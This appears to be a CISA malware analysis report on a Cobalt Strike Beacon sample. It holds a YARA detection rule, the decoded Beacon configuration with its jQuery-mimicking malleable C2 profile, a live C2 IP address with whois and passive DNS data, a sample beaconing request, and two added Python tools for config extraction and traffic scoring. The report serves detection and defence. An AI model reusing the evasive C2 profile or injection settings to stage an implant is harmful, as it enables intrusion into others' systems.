rule CISA_10398871_02 : trojan COBALTSTRIKE
{
    meta:
        Author = "CISA Code & Media Analysis"
        Incident = "10398871"
        Date = "2022-09-29"
        Last_Modified = "20221001_1200"
        Actor = "n/a"
        Category = "Trojan"
        Family = "COBALTSTRIKE"
        Description = "Detects CobaltStrike trojan shellcode samples with an embedded beacon"
        MD5 = "ff1d9474c2bfa9ada8d5ed3e16f0b04a"
        SHA256 = "3450d5a3c51711ae4a2bdb64a896d312ba638560aa00adb2fc1ebc34bee9369e"
    strings:
        $s1 = { 41 41 41 41 }
        $s2 = { 42 42 42 42 }
        $s3 = { 0F B6 45 10 8B 4D 08 03 4D FC 0F BE 11 33 D0 }
        $s4 = { 8B 4D 08 51 6A 01 8B 55 C0 52 FF 55 C8 }
    condition:
        uint16(9) == 0x5A4D and all of them
}
ssdeep Matches

No matches found.

Relationships
3450d5a3c5… Connected_To 207.148.76.235
3450d5a3c5… Contained_Within 233bb85dbeba69231533408501697695a66b7790e751925231d64bddf80bbf91
Description

This file is decrypted and executed by “vftrace.dll” (058434852bb8e877069d27f452442167). This file is a 32-bit Portable Executable (PE) DLL that has an embedded shellcode inside of the MZ header, which is located at the start of the file. When executed, the shellcode decrypts an embedded beacon payload using a single-byte XOR key 0xC3. It executes the entry point of the decrypted payload in memory at runtime. The decrypted payload has been identified as a Cobalt Strike Beacon implant. During execution, it decodes its configuration using a single-byte XOR key 0x4f. The configuration contains the RSA public key, C2, communication protocol, and more. The parsed configuration data for the Cobalt Strike Beacon implant is displayed below in JSON format:

–Begin configuration in the Cobalt Strike Beacon–
{
"BeaconType": [
   "HTTPS"                         ==> Beacon uses HTTPS to communicate
],
"Port": 443,
"SleepTime": 5000,                ==> Timing of C2 Beacons via the SleepTime and Jitter features
"MaxGetSize": 1403644,
"Jitter": 20,                     ==> Jitter value that forces Beacon to randomly modify its sleep time; a Jitter of 20 means a random jitter of 20% of the 5000 millisecond sleep time
"MaxDNS": "Not Found",
"PublicKey": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDApWEZn8vYHYN/JiXoF72xGpWuxdZ7gGRYn6E7+mFmsVDSzImL7GTMXrllB4TM6/oR+WDKk0L+8elLel63FXPQ3d3K/t1/8dnYBLpjPER+/G/iu2viAN+6KEsQfKA3O6ZvABg9/uH86G2erow7Ik4a2VinucYSkKJ8jYV1yfeDzQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",     ==> Public key used to encrypt communications
"PublicKey_MD5": "9b96180552065cdf6cc42f8ba6f43f8b",
"C2Server": "207[.]148[.]76[.]235,/jquery-3.3.1.min.js",
"UserAgent": "Mozilla/4.1 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
"HttpPostUri": "/jquery-3.3.2.min.js",
"Malleable_C2_Instructions": [
   "Remove 1522 bytes from the end",
   "Remove 84 bytes from the beginning",
   "Remove 3931 bytes from the beginning",
   "Base64 URL-safe decode",
   "XOR mask w/ random key"
],
"HttpGet_Metadata": {
   "ConstHeaders": [
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Referer: http://code.jquery.com/",
    "Accept-Encoding: gzip, deflate"
   ],
   "ConstParams": [],
   "Metadata": [
    "base64url",
    "prepend \"__cfduid=\"",
    "header \"Cookie\""
   ],
   "SessionId": [],
   "Output": []
},
"HttpPost_Metadata": {
   "ConstHeaders": [
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Referer: http://code.jquery.com/",
    "Accept-Encoding: gzip, deflate"
   ],
   "ConstParams": [],
   "Metadata": [],
   "SessionId": [
    "mask",
    "base64url",
    "parameter \"__cfduid\""
   ],
   "Output": [
    "mask",
    "base64url",
    "print"
   ]
},
"SpawnTo": "AAAAAAAAAAAAAAAAAAAAAA==",
"PipeName": "Not Found",
"DNS_Idle": "Not Found",
"DNS_Sleep": "Not Found",
"SSH_Host": "Not Found",
"SSH_Port": "Not Found",
"SSH_Username": "Not Found",
"SSH_Password_Plaintext": "Not Found",
"SSH_Password_Pubkey": "Not Found",
"SSH_Banner": "",
"HttpGet_Verb": "GET",
"HttpPost_Verb": "POST",
"HttpPostChunk": 0,
"Spawnto_x86": "%windir%\\syswow64\\dllhost.exe",
"Spawnto_x64": "%windir%\\sysnative\\dllhost.exe",
"CryptoScheme": 0,
"Proxy_Config": "Not Found",
"Proxy_User": "Not Found",
"Proxy_Password": "Not Found",
"Proxy_Behavior": "Use IE settings",
"Watermark": 1234567890,
"bStageCleanup": "True",
"bCFGCaution": "False",
"KillDate": 0,
"bProcInject_StartRWX": "False",
"bProcInject_UseRWX": "False",
"bProcInject_MinAllocSize": 17500,
"ProcInject_PrependAppend_x86": [
   "kJA=",
   "Empty"
],
"ProcInject_PrependAppend_x64": [
   "kJA=",
   "Empty"
],
"ProcInject_Execute": [
   "ntdll:RtlUserThreadStart",
   "CreateThread",
   "NtQueueApcThread-s",
   "CreateRemoteThread",
   "RtlCreateUserThread"
],
"ProcInject_AllocationMethod": "NtMapViewOfSection",
"ProcInject_Stub": "s7YR+gVAMtA1Jtjf0KV/Cw==",     ==> the Base64 encoded MD5 file hash of the Cobalt Strike
"bUsesCookies": "True",
"HostHeader": "",
"smbFrameHeader": "AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",
"tcpFrameHeader": "AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",
"headersToRemove": "Not Found",
"DNS_Beaconing": "Not Found",
"DNS_get_TypeA": "Not Found",
"DNS_get_TypeAAAA": "Not Found",
"DNS_get_TypeTXT": "Not Found",
"DNS_put_metadata": "Not Found",
"DNS_put_output": "Not Found",
"DNS_resolver": "Not Found",
"DNS_strategy": "round-robin",
"DNS_strategy_rotate_seconds": -1,
"DNS_strategy_fail_x": -1,
"DNS_strategy_fail_seconds": -1
}
–End configuration in the Cobalt Strike Beacon–

It is designed to use a malleable C2 profile that mimics requests for the jQuery JavaScript library in order to evade detection. It attempts to send a GET request to its C2 server with metadata in the "__cfduid" cookie header that contains information about the compromised system, such as the username, computer name, operating system (OS) version, the name of the malware executing on the victim's system, and other information. The metadata in the cookie header is encrypted and encoded.

Displayed below is the RSA public key used to encrypt the metadata before it is encoded using the NetBIOS (uppercase) and Base64 encoding algorithms:

–Begin public key–
30 81 9F 30 0D 06 09 2A 86 48 86 F7 0D 01 01 01 05 00 03 81 8D 00 30 81 89 02 81 81 00 C0 A5 61 19 9F CB D8 1D 83 7F 26 25 E8 17 BD B1 1A 95 AE C5 D6 7B 80 64 58 9F A1 3B FA 61 66 B1 50 D2 CC 89 8B EC 64 CC 5E B9 65 07 84 CC EB FA 11 F9 60 CA 93 42 FE F1 E9 4B 7A 5E B7 15 73 D0 DD DD CA FE DD 7F F1 D9 D8 04 BA 63 3C 44 7E FC 6F E2 BB 6B E2 00 DF BA 28 4B 10 7C A0 37 3B A6 6F 00 18 3D FE E1 FC E8 6D 9E AE 8C 3B 22 4E 1A D9 58 A7 B9 C6 12 90 A2 7C 8D 85 75 C9 F7 83 CD 02 03 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
–End public key–
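The single-byte XOR masking of the Beacon configuration described above, and the RSA public key carried in the PublicKey setting (the same DER structure shown in the hex dump), can be recovered from a memory or file image without vendor tooling. The following is an added example written for this advisory, not a tool from the report: it brute-forces the single-byte XOR key by looking for the masked form of the fixed 6-byte header every Beacon configuration starts with, walks the index/type/length records, and pulls the RSA modulus and exponent out of the DER key. The setting indices and record layout follow the publicly documented Beacon config format; the sample blob is constructed here from the values in the configuration listing above (defanged C2 string included) and is not bytes from the actual sample.

```python
"""Minimal Cobalt Strike Beacon config extractor (added example, not the report's tooling)."""
import base64
import struct

# Setting indices used by public Beacon config parsers (only the subset needed here).
SETTING_NAMES = {1: "BeaconType", 2: "Port", 3: "SleepTime", 4: "MaxGetSize", 5: "Jitter",
                 7: "PublicKey", 8: "C2Server", 9: "UserAgent", 10: "HttpPostUri", 37: "Watermark"}
BEACON_TYPES = {0: "HTTP", 1: "Hybrid HTTP DNS", 2: "SMB", 4: "TCP", 8: "HTTPS", 16: "Bind TCP"}
TYPE_SHORT, TYPE_INT, TYPE_DATA = 1, 2, 3
# Every config starts with setting 1 (BeaconType): index=1, type=short, length=2.
CONFIG_MAGIC = b"\x00\x01\x00\x01\x00\x02"
# DER SubjectPublicKeyInfo from the configuration listing above, without its zero padding.
PAGE_PUBLIC_KEY_B64 = ("MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDApWEZn8vYHYN/JiXoF72xGpWuxdZ7gGRYn6E7"
                       "+mFmsVDSzImL7GTMXrllB4TM6/oR+WDKk0L+8elLel63FXPQ3d3K/t1/8dnYBLpjPER+/G/iu2vi"
                       "AN+6KEsQfKA3O6ZvABg9/uH86G2erow7Ik4a2VinucYSkKJ8jYV1yfeDzQIDAQAB")


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def find_masked_config(blob: bytes):
    """Return (xor_key, offset) of a masked config, or (None, -1).
    Searching for the masked header under each key avoids decoding the blob 256 times."""
    for key in range(256):
        off = blob.find(xor_bytes(CONFIG_MAGIC, key))
        if off != -1:
            return key, off
    return None, -1


def parse_settings(config: bytes) -> dict:
    """Walk big-endian (index, type, length) records until an index of 0."""
    settings, pos = {}, 0
    while pos + 6 <= len(config):
        idx, typ, length = struct.unpack(">HHH", config[pos:pos + 6])
        if idx == 0:
            break
        pos += 6
        raw = config[pos:pos + length]
        pos += length
        if typ == TYPE_SHORT:
            value = struct.unpack(">H", raw[:2])[0]
        elif typ == TYPE_INT:
            value = struct.unpack(">I", raw[:4])[0]
        else:
            value = raw.rstrip(b"\x00")        # data settings are zero-padded to a fixed size
        settings[SETTING_NAMES.get(idx, f"setting_{idx}")] = value
    if "BeaconType" in settings:
        settings["BeaconType"] = BEACON_TYPES.get(settings["BeaconType"], "Unknown")
    return settings


def _der_tlv(buf: bytes, pos: int):
    """Read one DER tag and length; return (tag, body_start, body_end)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                          # long form: low bits give the length's byte count
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, pos, pos + length


def rsa_public_numbers(spki: bytes):
    """Extract (modulus, exponent) from a DER SubjectPublicKeyInfo for rsaEncryption."""
    _, p, _ = _der_tlv(spki, 0)                # outer SEQUENCE
    _, _, alg_end = _der_tlv(spki, p)          # AlgorithmIdentifier SEQUENCE (skipped)
    _, p, _ = _der_tlv(spki, alg_end)          # BIT STRING wrapping RSAPublicKey
    p += 1                                     # skip the "unused bits" byte
    _, p, _ = _der_tlv(spki, p)                # RSAPublicKey SEQUENCE
    _, s, e = _der_tlv(spki, p)                # INTEGER modulus
    n = int.from_bytes(spki[s:e], "big")
    _, s, e = _der_tlv(spki, e)                # INTEGER publicExponent
    return n, int.from_bytes(spki[s:e], "big")


def build_sample_blob(xor_key: int = 0x4F) -> bytes:
    """Constructed sample: a config with the listing's values, masked and wrapped in filler."""
    def rec(idx, typ, length, val):
        return struct.pack(">HHH", idx, typ, length) + val.ljust(length, b"\x00")
    config = (rec(1, TYPE_SHORT, 2, struct.pack(">H", 8))                    # 8 = HTTPS
              + rec(2, TYPE_SHORT, 2, struct.pack(">H", 443))
              + rec(3, TYPE_INT, 4, struct.pack(">I", 5000))
              + rec(5, TYPE_SHORT, 2, struct.pack(">H", 20))
              + rec(7, TYPE_DATA, 256, base64.b64decode(PAGE_PUBLIC_KEY_B64))
              + rec(8, TYPE_DATA, 256, b"207[.]148[.]76[.]235,/jquery-3.3.1.min.js")
              + rec(10, TYPE_DATA, 64, b"/jquery-3.3.2.min.js")
              + rec(37, TYPE_INT, 4, struct.pack(">I", 1234567890))
              + b"\x00" * 8)                                                 # terminator
    return b"\x90" * 32 + xor_bytes(config, xor_key) + b"\x90" * 32


def extract(blob: bytes) -> dict:
    key, off = find_masked_config(blob)
    if key is None:
        raise ValueError("no Beacon config header found under any single-byte key")
    settings = parse_settings(xor_bytes(blob[off:], key))
    settings["XorKey"] = key
    n, e = rsa_public_numbers(settings["PublicKey"])
    settings["PublicKey_bits"], settings["PublicKey_exponent"] = n.bit_length(), e
    # Beacon's jitter shortens the sleep by a random amount of up to Jitter percent.
    settings["SleepWindowMs"] = (settings["SleepTime"] * (100 - settings["Jitter"]) // 100,
                                 settings["SleepTime"])
    return settings


if __name__ == "__main__":
    for k, v in extract(build_sample_blob()).items():
        print(f"{k}: {v.hex()[:16] + '...' if k == 'PublicKey' else v}")
```

The header search is what makes this robust against an unknown key: the first record of every configuration is fixed, so its masked form identifies the key without any knowledge of the rest of the blob. On the public key, the DER walk is enough to confirm the key is the 1024-bit rsaEncryption key shown in the hex dump (the modulus begins 0xC0, exponent 65537), and the sleep window (4000 to 5000 ms here) is the interval a beaconing detection should expect between requests.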

Displayed below is a sample jQuery Malleable C2 Hypertext Transfer Protocol (HTTP) GET request with metadata in the cookie header:

–Begin request–
GET /jquery-3.3.1.min.js HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://code.jquery.com/
Accept-Encoding: gzip, deflate
Cookie: __cfduid=vZZ5M4aBtrWVoM5-rSVJFrF_ucMPaPE3QjFh6lc2jJ9YYlfZlI2k7M3PwRbOpG9HZXpYi7cauuFgY62ZfLQ9SvZF5anYnl0aQE6oR1Xi_D2fkuoNiug3oKXLk-Vj-Fwp1IhyNG4gKv0vzkU9Scy0EByFnaM2E-Prj__Bb1niJjw
User-Agent: Mozilla/4.1 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Host: 207[.]148[.]76[.]235
Connection: Keep-Alive
Cache-Control: no-cache
–End request–

Analysis indicates that the C2 server will respond to the above HTTP GET request with encrypted data that contains commands, which the malware will decrypt and execute to perform additional functions. The C2 server response payload was not available for analysis.
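The request above is what a proxy or web-gateway log would show, and its individual pieces (a jQuery path, a code.jquery.com Referer, a Cloudflare-style __cfduid cookie) are each chosen to look ordinary; what gives it away is the combination: a library fetched from a bare IP address instead of the CDN, a "Mozilla/4.1" token that no current browser sends, and a cookie value that is a 171-character base64url blob, which is exactly the size of a 128-byte ciphertext from the 1024-bit RSA key in the configuration. The following added example, written for this advisory and not taken from CISA or any vendor's detection content, scores a raw HTTP request against those profile characteristics. The profile constants come from the configuration listing; the sample request is the one shown above with the defanged Host restored; the benign request, the weights and the 5-point alert threshold are constructed for this example.

```python
"""Score an outbound HTTP request against the jQuery malleable C2 profile (added example)."""
import ipaddress
import re

# Request characteristics taken from the Beacon configuration listing above.
PROFILE_URIS = {"/jquery-3.3.1.min.js", "/jquery-3.3.2.min.js"}
PROFILE_REFERER = "http://code.jquery.com/"
PROFILE_COOKIE = "__cfduid"
PROFILE_UA = ("Mozilla/4.1 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36")
BASE64URL = re.compile(r"^[A-Za-z0-9_-]+$")
ALERT_THRESHOLD = 5   # chosen for this example

# The sample GET request shown above, with the defanged Host value restored so it parses.
SAMPLE_REQUEST = """GET /jquery-3.3.1.min.js HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://code.jquery.com/
Accept-Encoding: gzip, deflate
Cookie: __cfduid=vZZ5M4aBtrWVoM5-rSVJFrF_ucMPaPE3QjFh6lc2jJ9YYlfZlI2k7M3PwRbOpG9HZXpYi7cauuFgY62ZfLQ9SvZF5anYnl0aQE6oR1Xi_D2fkuoNiug3oKXLk-Vj-Fwp1IhyNG4gKv0vzkU9Scy0EByFnaM2E-Prj__Bb1niJjw
User-Agent: Mozilla/4.1 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Host: 207.148.76.235
Connection: Keep-Alive
Cache-Control: no-cache
"""

# Constructed benign request for the same library from the real CDN (not from the report).
BENIGN_REQUEST = """GET /jquery-3.3.1.min.js HTTP/1.1
Accept: */*
Referer: https://www.example.org/
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Host: code.jquery.com
Connection: keep-alive
"""


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, headers); header names are lower-cased."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def is_ip_literal(host: str) -> bool:
    """True when the Host header is an IP address rather than a hostname."""
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def score_request(raw: str):
    """Return (score, reasons); each reason is a (name, weight) pair that fired."""
    method, path, h = parse_request(raw)
    reasons = []
    if method == "GET" and path in PROFILE_URIS:
        reasons.append(("profile_uri", 2))
    if h.get("referer") == PROFILE_REFERER:
        reasons.append(("profile_referer", 1))
    m = re.search(rf"(?:^|;\s*){PROFILE_COOKIE}=([^;]*)", h.get("cookie", ""))
    # A 1024-bit RSA ciphertext is 128 bytes, i.e. 171 unpadded base64url characters;
    # a genuine Cloudflare __cfduid value was a short token, never a blob of that size.
    if m and BASE64URL.match(m.group(1)) and len(m.group(1)) >= 128:
        reasons.append(("opaque_cfduid_blob", 3))
    ua = h.get("user-agent", "")
    if ua == PROFILE_UA:
        reasons.append(("profile_user_agent", 2))
    elif ua.startswith("Mozilla/4."):          # current browsers all send Mozilla/5.0
        reasons.append(("legacy_mozilla_token", 1))
    if path.startswith("/jquery") and is_ip_literal(h.get("host", "")):
        reasons.append(("library_fetched_from_ip_literal", 2))   # a CDN is a hostname
    return sum(w for _, w in reasons), reasons


def is_c2_candidate(raw: str) -> bool:
    return score_request(raw)[0] >= ALERT_THRESHOLD


if __name__ == "__main__":
    for name, req in (("sample", SAMPLE_REQUEST), ("benign", BENIGN_REQUEST)):
        print(name, score_request(req))
```

Scoring rather than a single-field match matters here because the profile's individual values are easy for an operator to change, while the structural mismatches (IP-literal host for a CDN asset, an RSA-sized cookie) survive such edits. In practice the same logic would run over proxy or IDS logs, and a sleep-interval check (roughly 4 to 5 seconds between requests for this configuration) would be the next signal to add.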

Displayed below are sample functions built into the malware:

–Begin commands–
Make and change directories
Copy or move files to the specified destination, and remove files
Download and upload files
List drives on the victim's system
List files in a folder
Enable system privileges
Kill the specified process
Show running processes
Bind the specified port on the victim's system
Disconnect from a named pipe
Inject into processes
Create services
–End commands–

Screenshots

Figure 2 - The screenshot of the shellcode embedded in the MZ header.

207.148.76.235

Ports
Whois

Recent Passive DNS Resolutions
wordpress-499253-1580367.cloudwaysapps.com
207.148.76.235
kejhnaxoi.alosmart.in
207.148.76.235
chanlycuocsong.com
207.148.76.235
291bc2ac-bd67-11e9-bd1f-d89d67231d10.vuhongminh.com
207.148.76.235
update.vuhongminh.com
207.148.76.235

IP Location
   Country: Singapore
   Region: Central Singapore
   City: Singapore
   ISP: Sgp_vultr_cust

Whois Server
   whois.apnic.net

Whois Record
% Abuse contact for '207.148.64.0 - 207.148.79.255' is 'abuse@choopa.com'

inetnum:        207.148.64.0 - 207.148.79.255
netname:        SGP_VULTR_CUST
descr:         SGP_VULTR_CUST
country:        SG
admin-c:        CLA15-AP
tech-c:         CLA15-AP
abuse-c:        AC1765-AP
status:         ASSIGNED NON-PORTABLE
mnt-by:         MAINT-CHOOPALLC-AP
mnt-irt:        IRT-CHOOPALLC-AP
last-modified: 2021-02-09T13:52:42Z
source:         APNIC

irt:            IRT-CHOOPALLC-AP
address:        100 Matawan Rd, Matawan NJ 07747
e-mail:         abuse@choopa.com
abuse-mailbox: abuse@choopa.com
admin-c:        CLA15-AP
tech-c:         CLA15-AP
auth:         # Filtered
remarks:        abuse@choopa.com was validated on 2022-04-14
mnt-by:         MAINT-CHOOPALLC-AP
last-modified: 2022-04-14T13:11:20Z
source:         APNIC

role:         ABUSE CHOOPALLCAP
address:        100 Matawan Rd, Matawan NJ 07747
country:        ZZ
phone:         +000000000
e-mail:         abuse@choopa.com
admin-c:        CLA15-AP
tech-c:         CLA15-AP
nic-hdl:        AC1765-AP
remarks:        Generated from irt object IRT-CHOOPALLC-AP
remarks:        abuse@choopa.com was validated on 2022-04-14
abuse-mailbox: abuse@choopa.com
mnt-by:         APNIC-ABUSE
last-modified: 2022-04-14T13:12:10Z
source:         APNIC

role:         Choopa LLC administrator
address:        319 Clematis St. Suite 900
country:        US
phone:         +1-973-849-0500
fax-no:         +1-973-849-0500
e-mail:         abuse@vultr.com
admin-c:        CLA15-AP
tech-c:         CLA15-AP
nic-hdl:        CLA15-AP
mnt-by:         MAINT-CHOOPALLC-AP
last-modified: 2022-07-19T11:35:13Z
source:         APNIC

route:         207.148.64.0/20
origin:         AS20473
descr:         Choopa, LLC
               14 Cliffwood Ave
               Suite 300
mnt-by:         MAINT-CHOOPALLC-AP
last-modified: 2020-04-21T14:39:46Z
source:         APNIC

Relationships
207.148.76.235 Connected_From 3450d5a3c51711ae4a2bdb64a896d312ba638560aa00adb2fc1ebc34bee9369e
Description

The C2 domain configured in the Cobalt Strike Beacon.